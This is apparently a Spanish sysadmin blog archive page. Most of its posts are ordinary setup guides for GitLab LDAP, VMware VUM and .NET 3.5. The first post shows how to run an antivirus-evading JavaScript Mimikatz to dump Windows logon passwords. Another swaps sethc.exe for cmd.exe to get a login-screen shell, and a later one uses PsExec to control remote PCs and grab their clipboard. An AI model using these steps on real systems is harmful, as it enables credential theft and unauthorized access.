Mostrando entradas con la etiqueta Windows. Mostrar todas las entradas
Mostrando entradas con la etiqueta Windows. Mostrar todas las entradas

lunes, 14 de agosto de 2017

Mimikatz Indetectable

Leí por ahí lo fácil que era usar Mimikatz, pero era detectado por cualquier antivirus. Buscando un poco me topé con que hay una versión en Java Script que es indetectable. 

Descargamos el katz.js del siguiente enlace:
https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f/archive/2adcc9d2570b4367c6cc405e5a5969863d04fc9b.zip

Lo ejecutamos simplemente con el siguiente comando y esperamos unos minutos:

c:\> cscript katz.js



Finalmente ejecutamos estos dos comandos:

privilege::debug
sekurlsa::logonpasswords

Y obtendremos los usuarios, el dominio y sus contraseñas:



FUENTE: https://github.com/gentilkiwi/mimikatz

martes, 14 de marzo de 2017

Restablecer contraseña de Administrador de Windows 7 con Clonezilla


Reiniciamos la Pc con el pendrive del clonezilla conectado y seleccionamos que bootee desde usb:


Seleccionamos la opción por defecto:


Elegimos el lenguaje deseado:


No tocar el keymap:


Ingresamos en la linea de comandos:


Ejecutamos lo siguiente para loguearnos como root:

$ sudo su - root


Vemos con fdisk en que partición tenemos instalado windows, yo ya conozco que estaba en la partición de 454Gb, pero podemos probar montar una por una para ver donde está realmente:

# fdisk -l |grep NTFS


Montamos la partición en /mnt con:

# mount /dev/sda3 /mnt/

Y luego ingresamos en el directorio System32:

# cd /mnt/Windows/System32/


Hacemos una copia del sethc.exe original para no perderlo:

# cp -pf sethc.exe sethc.exe.orig

Y luego lo pisamos con el cmd.exe:

# cp -pf cmd.exe sethc.exe 

Finalmente reiniciamos el sistema y dejamos que inicie con el windows nuevamente:

# reboot 


Una vez que nos pide login de windows, sin loguearnos tocamos varias veces la tecla SHIFT hasta que aparezca la ventana de CMD:


Tipeamos en la ventana negra los siguiente:

C:\Windows\System32> control userpasswords2

Seleccionamos el usuario administrador y restablecemos la clave:


Ya podemos ingresar al windows con el usuario administrador local.



miércoles, 22 de febrero de 2017

Autenticar GitLab con Active Directory

Luego de instalar GitLab con el siguiente enlace: https://redes-seguridad.blogspot.com.ar/2017/02/instalando-gitlab-en-debian-8.html

Pasaré a explicar como autenticarlo con LDAP.


Antes que nada realizamos una copia de la config del git:
cp -pf /etc/gitlab/gitlab.rb /etc/gitlab/gitlab.rb.orig

Agregamos lo siguiente en la sección "LDAP Settings", tener en cuenta los TABs y espacios, ya que si se modifica algo no va a funcionar. Reemplazar lo que está en rojo por los valores que correspondan a c/u:

### LDAP Settings
###! Docs: https://docs.gitlab.com/omnibus/settings/ldap.html
###! **Be careful not to break the indentation in the ldap_servers block. It is
###!   in yaml format and the spaces must be retained. Using tabs will not work.**
 gitlab_rails['ldap_enabled'] = true
###! **remember to close this block with 'EOS' below**
 gitlab_rails['ldap_servers'] = YAML.load <<- br="">   main: # 'main' is the GitLab 'provider ID' of this LDAP server
     label: 'LDAP'
     host: '192.168.0.1'      #Ip del servidor LDAP con AD
     port: 389      #Puerto si utiliza método plano, para ssl es otro
     uid: 'sAMAccountName'        
     method: 'plain' # "tls" or "ssl" or "plain"
     bind_dn: 'CN=Nombre Apellido Usuario para Leer el LDAP, OU=Users,OU=Ruta=Dominio,OU=Completa de OUs, DC=Mi,DC=Dominio,DC=com'
     password: 'Poner Password del usuario de arriba'
     active_directory: true
     allow_username_or_email_login: false
     block_auto_created_users: false
     base: 'OU=Ruta,OU=Completa,OU=donde,OU=buscar,OU=Usuarios Permitidos,DC=Mi,DC=Dominio,DC=com'
     user_filter: ''
     attributes:
       username: ['uid', 'userid', 'sAMAccountName']
       email:    ['mail', 'email', 'userPrincipalName']
       name:       'cn'
       first_name: 'givenName'
       last_name:  'sn'
 EOS          #No olvidar descomentar esta linea

Aplicamos los cambios:

gitlab-ctl reconfigure

Chequeamos que funcione la autenticación en LDAP:

gitlab-rake gitlab:ldap:check
Checking LDAP ...
Acá debe aparecer el listado de los usuarios de la OU base que configuramos"Server: ldapmain
LDAP authentication... Success
Checking LDAP ... Finished

Si obtenemos algún error de autenticación podremos utilizar el ldapsearch instalando lo siguiente:

apt-get install ldapscripts


Ejecutamos una búsqueda dentro del LDAP desde el linux con el siguiente comando, reemplazando lo que está en rojo:

ldapsearch -v -H ldap://ip_del_active_directory -b "OU=Users,OU=Sistemas,OU=Desarrolladores,DC=My,DC=Dominio,DC=com" -D "CN=Nombre Apellido,OU=Usuarios,OU=Sistemas,DC=My,DC=Dominio,DC=com" -W

El -D es el bind_dn y el -b es el base que configuraríamos en el git.


Reiniciamos el git:

gitlab-ctl restart
ok: run: gitlab-workhorse: (pid 8625) 0s
ok: run: logrotate: (pid 8632) 1s
ok: run: nginx: (pid 8639) 0s
ok: run: postgresql: (pid 8646) 1s
ok: run: redis: (pid 8655) 0s
ok: run: sidekiq: (pid 8660) 0s
ok: run: unicorn: (pid 8665) 1s


Nos logueamos a la página del gitlab y verificamos que podemos entrar con algún usuario del dominio de LDAP.


Si nos da error también podemos ejecutar un tail a la siguiente ruta:

tail -f /var/log/gitlab/gitlab-rails/production.log


miércoles, 17 de agosto de 2016

PBM error occurred during PreCloneCheckCallback

Al intentar clonar una máquina virtual me encontré con el siguiente error:

Se produjo un error general del sistema: PBM error occurred during PreCloneCheckCallback: No connection could be made because the target machine actively refused it:



Nos logueamos al VCenter a ver si estaban todos los servicios habilitados y efectivamente había uno bajo, el: "VMware vSphere Profile-Driven Storage Service"


Lo inicié manualmente y dejé de tener el error al clonar la virtual.

Fuente: https://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2118551


miércoles, 13 de julio de 2016

Instalar VMware vSphere Update Manager (VUM)

Qué es el VMware vSphere Update Manager ó VUM?

VUM permite actualizar parches críticos, no críticos ó hacer un upgrade de versión de VMware, por ejemplo de ESX 5.1 a ESX 6.0.

No sólo permite hacer actualizaciones de hosts, sino también de máquinas virtuales y aplicaciones virtuales.

Se agrega un plug-in en el vSphere Client en el cuál nos permite cargar imágenes y actualizaciones directamente desde el cliente de vmware, no es necesario poner el CD en el servidor para actualizarlo.

Una vez instalado lo veremos acá:



Comenzamos la instalación:

Nos dirigimos a la ruta donde tenemos instalado el vCenter y damos click derecho sobre el autorun y ejecutamos como administrador:


Nos dirigimos al apartado "vSphere Update Manager" y luego hacemos click sobre "Server" (1 en rojo en la imagen), luego tildamos la opción 2 (en rojo) y damos install. Esto obviamente si necesitamos utilizar un SQL Express, si tenemos un sql en otro server utilizamos ese, en este caso voy a explicar usando el express en este mismo equipo:


Elegimos el idioma:


Destildamos la opción para que actualice y siguiente:


Ingresamos la direción ip del servidor donde instalamos el vCenter, luego usuario y password y damos siguiente:


Y listo, finalizar la instalación:


Nos logueamos en el vSphere Client y vamos a la solapa "Plug-ins" y seleccionamos "Manage Plug-ins...":


Buscamos en los Plug-ins disponibles el que dice: "Extensión de VMware vSphere Update Manager" y luego clickeamos sobre: "Download and Install..."


Ejecutar:


Seleccionamos el idioma deseado:


Siguiente:


Aceptamos la lic y siguiente:


Instalar:


Si:


Y finalmente vamos al "Home" del vSphere Cliente y vemos que nos aparece ahora "Update Manager":


Y vemos que nos da una breve explicación:


Listo, finalizada la instalación del VUM

También vemos en el vSphere que aparece una nueva solapa: "Update Manager":




jueves, 26 de mayo de 2016

Instalar Microsoft .NET 3.5 en Windows Server 2012 R2

Al querer instalar el NC_net (cliente que utiliza el nagios en windows) me arrojaba el siguiente error:


Me decía que no tenía instalada la versión del .Net Framework version 3.5.


Al ir al Server Manager para instalarla aparecía grisada, asi que buscando un poco llegué a que hay que instalar el siguiente update: http://go.microsoft.com/fwlink/?LinkId=513775

Luego de descargarlo lo instalamos como administrador:



Una vez instalado el update vamos a habilitar el rol desde el server manager:



Click en "Manage" -> "Add Roles and Features":



Next:


"Role based on feature-based installation" -> "Next":



Así como está -> "Next":



Sin agregar ni tildar nada -> "Next":



Tilamos las siguientes opciones de .Net 3.5 -> "Next":



Tener en cuenta que debemos especificar el source path de instalación:



Dejamos esto momentaneamente acá y abrimos la iso de la instalación con el WinRAR, vamos a la carpeta sources:


Y copiamos la carpeta sxs en una ubicación deseada por nosotros, en mi caso usé: G:\Sources


Volvemos donde habíamos dejado la instalación del .Net y colocamos en el path donde copiamos recién los fuentes, en: G:\Sources\sxs y damos ok:



Finalizada la instalación -> "Close":



Esta vez volví a ejecutar el instalador y completó la instalación con el .NET 3.5 ya instalado:



FUENTE: https://support.microsoft.com/en-us/kb/3005628

viernes, 13 de noviembre de 2015

Bajar Volumen Remotamente desde CMD

Antes debo aclarar que para esto debemos tener la clave de administrador de ambos equipos.

Descargar el nircmd.exe de 64 bits de http://www.nirsoft.net/utils/nircmd-x64.zip, descomprimirlo y ponerlo en la pc remota mediante: \\192.168.1.1\c$\windows\System32 reemplazar la ip por la remota deseada.

Descargar PsTools de: https://technet.microsoft.com/en-us/sysinternals/pstools.aspx


Primero utilizaremos en la pc local los siguientes comandos para probarlo, luego lo convinaremos con pstools para ejecutarlo remoto.


Sube el volumen al tope:
nircmd.exe changesysvolume +65535


Baja el volumen al tope:
nircmd.exe changesysvolume -65535


Poner en mute el speaker:
nircmd.exe mutesysvolume 0


Mute al speaker:
nircmd.exe mutesysvolume 1


Swap de volumen entre mute y lo que estaba anteriormente:
nircmd.exe mutesysvolume 2


Apaga el monitor:
nircmd.exe monitor off


Ocultar iconos del escritorio:
nircmd.exe win hide class progman
nircmd.exe win show class progman


Matar navegadores iexplorer y chrome:
nircmd.exe killprocess iexplore.exe
nircmd.exe killprocess chrome.exe


Ahora se muestra como hacerlo remotamente con el pstools en conjunto con el nircmd:

Bajar el volumen remoto:
PsExec.exe \\nombre_pc -s -i -d nircmd.exe changesysvolume -65535


Copiar en porta papeles remoto algo:
PsExec.exe \\nombre_pc -s -i -d nircmd.exe clipboard set "algo en el portapapeles"


Copiar de porta papeles remoto a un archivo local:


PsExec.exe \\nombre_pc -s -i -d nircmd.exe clipboard addfile "c:\test.txt"


FUENTES: http://www.nirsoft.net/utils/nircmd.html
                     https://technet.microsoft.com/en-us/sysinternals/pstools.aspx

lunes, 24 de agosto de 2015

Dar Permiso a Usuario para Desbloquear en Active Directory

Abrimos el ADSIedit.msc desde el el ejecutar:


Nos dirigimos a la OU donde queremos que el usuario tenga permisos para desbloquear usuarios. Tener en cuenta que sólo de esa unidad organizativa podrá realizarlo -> botón derecho -> Propiedades:


Hacemos click sobre solapa de "Seguridad" y luego en el botón "Advanced":


Elegimos el usuario para que tenga permiso para desbloquear y luego avanzada:


Editamos el usuario:


Damos permisos a estas dos opciones y listo, damos ok a todas las ventanas: